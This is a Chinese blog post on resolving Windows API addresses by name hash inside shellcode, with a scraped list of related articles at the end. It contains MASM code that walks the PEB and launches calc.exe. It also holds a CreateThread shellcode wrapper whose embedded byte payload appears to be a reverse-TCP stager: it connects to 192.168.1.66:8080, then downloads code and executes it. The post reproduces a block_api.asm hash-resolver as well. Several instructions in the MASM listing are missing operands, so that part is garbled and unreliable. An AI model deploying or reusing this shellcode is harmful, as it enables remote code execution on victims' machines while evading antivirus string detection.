我们一般要获得一个函数的地址,通常采用的是明文,例如定义一个api函数字符串"MessageBoxA",然后在GetProcAddress函数中一个字节一个字节进行比较。这样弊端很多,例如如果我们定义一个杀毒软件比较敏感的api函数字符串,那么可能就会增加杀毒软件对我们的程序的判定值,而且定义这些字符串还有一个弊端是占用的字节数较大。我们想想如何我们的api函数字符串通过算法将它定义成一个4字节的值,然后在GetProcAddress中把AddressOfNames表中的每个地址指向的api字符串通过我们的算法压缩成4字节值后,与我们之前定义的4字节值进行判断,如果匹配成功则读取函数地址。

  我们来看一种rol 3移位算法,这个算法是每次将目的地址循环向左移动3位,然后将低字节与源字符串的每个字节进行异或。算法很精巧方便。还有很多方便小巧的算法,例如ROR 13等算法,其实它和我们上面的基本一样,只不过它将函数名表的字符串通过我们的算法过程获得hash值后与我们之前定义的hash值进行匹配,匹配成功则获得对应函数的地址。

  下面的代码通过hash搜索WinExec函数来运行Clac:

 .

    .model flat, stdcall

    option casemap:none  

include windows.inc

include user32.inc

include kernel32.inc

includelib user32.lib

includelib kernel32.lib  

    .const

szCalc      db 'calc.exe',   

    .code  

_GetKrnl32 proc  

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

; 获取kernel32.dll的地址,因为xp和win7不一样

; 故采用比较名称的方式获取地址,具体见Kernel32基地址获得学习

; http://blog.csdn.net/programmingring/article/details/11357393

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

    assume fs:nothing

    mov eax, fs:[30h]

    mov eax, [eax + 0ch]

    mov eax, [eax + 1ch]        ; 第一个LDR_MODULE

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

; 压入kernel32.dll的unicode字符串

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

    push dword ptr 006ch

    push dword ptr 6c0064h

    push dword ptr 2e0032h

    push dword ptr 33006ch

    push dword ptr 65006eh

    push dword ptr 720065h

    push word ptr 006bh

    mov ebx, esp              ; ebx指向字符串

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

; 开始比较

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

_Search:

    cmp eax,

    jz _NotFound

    cmp eax, 0ffffffffh

    jz _NotFound

    lea esi, [eax + 1ch]          ; esi指向UNICODE_STRING结构

    xor ecx, ecx

    mov cx,               ; 比较的长度

    mov esi, [esi + ]          ; 获得UNICODE_STRING结构的Buffer成员

    mov edi, ebx              ; edi指向kernel32unicode字符串

    repz cmpsw

    or ecx, ecx              ; ecx减完说明相等

    jz _Found

    mov eax, [eax]              ; 获取下一个LDR_MODULE

    jmp _Search  

_NotFound:

    mov eax, 0ffffffffh

    jmp _Over  

_Found:

    mov eax, [eax + 08h]          ; 获得地址

_Over:

    add esp,

    ret  

_GetKrnl32 endp  

_GetRolHash proc _lpApiString  

    mov eax, _lpApiString

    push esi

    xor edx, edx

    xchg eax, esi              ; esi = _lpApiString

    cld                  ; 递增

_Next:

    lodsb                  ; 从esi指向的地址中取一个字符

    test al, al              ; 比较是否为0

    jz _Ret

    rol edx,               ; 左循环移位3位

    xor dl, al              ; 低字节和字符异或

    jmp _Next  

_Ret:

    xchg eax, edx              ; eax = 处理后的_lpApiString的hash

    pop esi

    ret  

_GetRolHash endp  

_GetApi proc _hDllHandle, _iHashApi  

    push ebp

    mov eax, _hDllHandle

    mov ecx, _iHashApi

    mov ebx, eax

    mov edi, ecx  

    mov eax, [ebx + 3ch]

    mov esi, [ebx + eax + 78h]          ; Get Export RVA

    lea esi, [esi + ebx + IMAGE_EXPORT_DIRECTORY.NumberOfNames]

    lodsd

    xchg eax, edx                   ; edx = NumberOfNames

    lodsd

    push eax                        ; [esp] = AddressOfFunctions

    lodsd

    xchg eax, ebp                      ; ebp = AddressOfNames

    lodsd

    xchg eax, ebp                   ; ebp = AddressOfNameOrdinals, eax = AddressOfNames

    add eax, ebx

    xchg eax, esi                   ; esi = AddressOfNames  

_LoopScas:

    dec edx

    js _Ret

    lodsd                  ; eax = api名称的rva

    add eax, ebx              ; eax = api名称的实际地址

    push edx

    invoke _GetRolHash, eax         ; 计算hash字符串  

    pop edx

    cmp eax, edi              ; 比较和传入的hash参数是否相等

    jz _GetAddr  

    add ebp,               ; 递增,和esi相对应

    jmp _LoopScas  

_GetAddr:

    movzx eax, word ptr [ebp + ebx]      ; 取得序号值

    shl eax,               ; 乘4

    add eax, [esp]              ; 在AddressOfFunctions取得相应序号值位置的值

    mov eax, [ebx + eax]          ; 取得函数地址

    add eax, ebx  

_Ret:

    pop ecx

    pop ebp

    ret  

_GetApi endp  

_WinMain proc  

    invoke _GetKrnl32

    invoke _GetApi, eax, 016ef74bh      ; "WinExec"的hash

    push SW_SHOW

    lea ebx, szCalc

    push ebx

    call eax

    ret  

_WinMain endp

start:

    call _WinMain

    invoke ExitProcess,   

    end start

另外一段代码:新建一个线程的shellcode,payload: 后面的内容为要新建线程要执行的内容。

[BITS 32]

[ORG 0]

cld

call start

delta:

%include "block_api.asm"

start:

  pop ebp ; pop off the address of 'api_call' for calling later.

  xor eax, eax

  push eax

  push eax

  push eax

  lea ebx, [ebp+threadstart-delta]

  push ebx

  push eax

  push eax

  push 0x160D6838 ; hash( "kernel32.dll", "CreateThread" )

  call ebp ; CreateThread( NULL, 0, &threadstart, NULL, 0, NULL );

  jmp end

threadstart:

  pop eax ; pop off the unused thread param so the prepended shellcode can just return when done.

  payload: db 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x68,0xc0,0xa8,0x01,0x42,0x68,0x02,0x00,0x1f,0x90,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x61,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x22,0x58,0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0xe9,0x71,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc7,0xc3,0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5

  end

  

 

  上面代码里block_api.asm

api_call:

  pushad                 ; We preserve all the registers for the caller, bar EAX and ECX.

  mov ebp, esp           ; Create a new stack frame

  xor eax, eax           ; Zero EAX (upper 3 bytes will remain zero until function is found)

  mov edx, [fs:eax+48]   ; Get a pointer to the PEB

  mov edx, [edx+12]      ; Get PEB->Ldr

  mov edx, [edx+20]      ; Get the first module from the InMemoryOrder module list

next_mod:                ;

  mov esi, [edx+40]      ; Get pointer to modules name (unicode string)

  movzx ecx, word [edx+38] ; Set ECX to the length we want to check

  xor edi, edi           ; Clear EDI which will store the hash of the module name

loop_modname:            ;

  lodsb                  ; Read in the next byte of the name

  cmp al, 'a'            ; Some versions of Windows use lower case module names

  jl not_lowercase       ;

  sub al, 0x20           ; If so normalise to uppercase

not_lowercase:           ;

  ror edi, 13            ; Rotate right our hash value

  add edi, eax           ; Add the next byte of the name

  loop loop_modname      ; Loop until we have read enough

  ; We now have the module hash computed

  push edx               ; Save the current position in the module list for later

  push edi               ; Save the current module hash for later

  ; Proceed to iterate the export address table,

  mov edx, [edx+16]      ; Get this modules base address

  mov ecx, [edx+60]      ; Get PE header

  ; use ecx as our EAT pointer here so we can take advantage of jecxz.

  mov ecx, [ecx+edx+120] ; Get the EAT from the PE header

  jecxz get_next_mod1    ; If no EAT present, process the next module

  add ecx, edx           ; Add the modules base address

  push ecx               ; Save the current modules EAT

  mov ebx, [ecx+32]      ; Get the rva of the function names

  add ebx, edx           ; Add the modules base address

  mov ecx, [ecx+24]      ; Get the number of function names

  ; now ecx returns to its regularly scheduled counter duties

  ; Computing the module hash + function hash

get_next_func:           ;

  jecxz get_next_mod     ; When we reach the start of the EAT (we search backwards), process the next module

  dec ecx                ; Decrement the function name counter

  mov esi, [ebx+ecx*4]   ; Get rva of next module name

  add esi, edx           ; Add the modules base address

  xor edi, edi           ; Clear EDI which will store the hash of the function name

  ; And compare it to the one we want

loop_funcname:           ;

  lodsb                  ; Read in the next byte of the ASCII function name

  ror edi, 13            ; Rotate right our hash value

  add edi, eax           ; Add the next byte of the name

  cmp al, ah             ; Compare AL (the next byte from the name) to AH (null)

  jne loop_funcname      ; If we have not reached the null terminator, continue

  add edi, [ebp-8]       ; Add the current module hash to the function hash

  cmp edi, [ebp+36]      ; Compare the hash to the one we are searching for

  jnz get_next_func      ; Go compute the next function hash if we have not found it

  ; If found, fix up stack, call the function and then value else compute the next one...

  pop eax                ; Restore the current modules EAT

  mov ebx, [eax+36]      ; Get the ordinal table rva

  add ebx, edx           ; Add the modules base address

  mov cx, [ebx+2*ecx]    ; Get the desired functions ordinal

  mov ebx, [eax+28]      ; Get the function addresses table rva

  add ebx, edx           ; Add the modules base address

  mov eax, [ebx+4*ecx]   ; Get the desired functions RVA

  add eax, edx           ; Add the modules base address to get the functions actual VA

  ; We now fix up the stack and perform the call to the desired function...

finish:

  mov [esp+36], eax      ; Overwrite the old EAX value with the desired api address for the upcoming popad

  pop ebx                ; Clear off the current modules hash

  pop ebx                ; Clear off the current position in the module list

  popad                  ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered

  pop ecx                ; Pop off the origional return address our caller will have pushed

  pop edx                ; Pop off the hash value our caller will have pushed

  push ecx               ; Push back the correct return value

  jmp eax                ; Jump into the required function

  ; We now automagically return to the correct caller...

get_next_mod:            ;

  pop edi                ; Pop off the current (now the previous) modules EAT

get_next_mod1:           ;

  pop edi                ; Pop off the current (now the previous) modules hash

  pop edx                ; Restore our position in the module list

  mov edx, [edx]         ; Get the next module

  jmp short next_mod     ; Process this module

  

hash算法搜索获得api函数地址的实现,"kernel32.dll", "CreateThread"的更多相关文章

  1. 逐步实现hash算法(基于BKDRhash函数)

    哈希(Hash)算法,即散列函数.它是一种单向密码体制,即它是一个从明文到密文的不可逆的映射,只有加密过程,没有解密过程.同时,哈希函数可以将任意长度的输入经过变化以后得到固定长度的输出.hash算法 ...

  2. hash算法

    作者:July.wuliming.pkuoliver 说明:本文分为三部分内容, 第一部分为一道百度面试题Top K算法的详解:第二部分为关于Hash表算法的详细阐述:第三部分为打造一个最快的Hash ...

  3. Hash算法的讲解

    散列表,又叫哈希表,它是基于快速存取的角度设计的,也是一种典型的“空间换时间”的做法.顾名思义,该数据结构可以理解为一个线性表,但是其中的元素不是紧密排列的,而是可能存在空隙. 散列表(Hash ta ...

  4. 旧书重温:0day2【4】动态获取函数地址

    通过以上3篇文章的学习,我们已经可以获取到kernel32.dll的地址了下一步 我们就是获取几个重要的函数 1.GetProcAddress 2.LoadLibrary 有了这两个函数很多函数都可以 ...

  5. advapi32.dll kernel32.dll 中的两套注册表API

    日前遇到一件事:WebBrowser中的网页会用到一个“大众”ActiveX控件,为了保证兼容性以及和其它程序互不干扰,我们采用这样一种方案: 1. 我们的软件会自带该控件: 2. 如果系统中已注册有 ...

  6. HASH、HASH函数、HASH算法的通俗理解

    之前经常遇到hash函数或者经常用到hash函数,但是hash到底是什么?或者hash函数到底是什么?却很少去考虑.最近同学去面试被问到这个问题,自己看文章也看到hash的问题.遂较为细致的追究了一番 ...

  7. hash算法和常见的hash函数 [转]

       Hash,就是把任意长度的输入,通过散列算法,变换成固定长度的输出,该输出就是散列值. 这种转换是一种压缩映射,也就是,散列值的空间通常远小于输入的空间,不同的输入可能 会散列成相同的输出,而不 ...

  8. [区块链] 密码学中Hash算法(基础)

    在介绍Hash算法之前,先给大家来个数据结构中对hash表(散列表)的简单解释,然后我再逐步深入,讲解一下hash算法. 一.Hash原理——基础篇 1.1 概念 哈希表就是一种以 键-值(key-i ...

  9. Hash算法入门指南(聊点不一样的算法人生)

    前言 很多人到现在为止都总是问我算法该怎么学啊,数据结构好难啊怎么的,学习难度被莫名的夸大了,其实不然.对于一个学计算机相关专业的人都知道,数据结构是大学的一门必修课,数据结构与算法是基础,却常常容易 ...

随机推荐

  1. 在Delphi中动态地使用SQL查询语句 Adoquery sql 参数 冒号

    在Delphi中动态地使用SQL查询语句 在一般的数据库管理系统中,通常都需要应用SQL查询语句来提高程序的动态特性.下面介绍如何在Delphi中实现这种功能.在Delphi中,使用SQL查询语句的途 ...

  2. bzoj3622-已经没有什么好害怕的的了

    题意 给出两个长度为 \(n\) 的数列 \(a,b\) ,\(2n\) 个数都互不相同,求有多少种对应方式使得 \(a_i>b_i\) 的个数比 \(a_i<b_i\) 的个数恰好多 \ ...

  3. 【HLSDK系列】服务端 UpdateClientData 函数

    首先说明下,这个函数是写在 mp.dll 里的. 服务器会给每个客户端发送一些数据,其中两大数据种类就是 clientdata_t 和 entity_state_t 这里要说的是 clientdata ...

  4. 【BZOJ1497】【NOI2006】最大获利(网络流)

    [BZOJ1497][NOI2006]最大获利(网络流) 题面 BZOJ Description 新的技术正冲击着手机通讯市场,对于各大运营商来说,这既是机遇,更是挑战.THU集团旗下的CS& ...

  5. 解题:ZJOI 2006 书架

    题面 学习了如何在维护序列的平衡树上查找某个数:按初始的顺序定个权值,然后每次找那个权值的DFS序即可.具体实现就是不停往上跳,然后是父亲的右儿子就加上父亲的左儿子,剩下的就是继续熟悉无旋树堆 #in ...

  6. Amphetamine的cf日记

    之前挂上的 今天填坑 2018.2.14 #462 A 给两个集合,B分别可以从一个集合中选一个数,B想乘积最大,A想最小,A可以删除一个第一个集合中的元素,问最小能达到多少. 这题..水死啦.我居然 ...

  7. mysql日志配置

    mysql在错误排查,优化的时候会用到日志 有错误日志,查询日志,慢查询日志,二进制日志 先找到日志文件,linux 一般在/etc/my.cnf中 打开看到 log-error=/webserver ...

  8. C#中调用Dll动态链接库

    C#中调用Dll动态链接库 起始 受限于语言的不同,我们有的时候可能会用别人提供的函数及方法 或者其他的什么原因.反正就是要调!!! 恰巧别人所使用的的语言跟自己又不是一样的 这个时候想要调用别人的函 ...

  9. vue 父子组件相互传递数据

    例子一 <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta ...

  10. 跟我一起写Makefile(七)

    make 的运行—————— 一般来说,最简单的就是直接在命令行下输入make命令,make命令会找当前目录的makefile来执行,一切都是自动的.但也有时你也许只想让make重编译某些文件,而不是 ...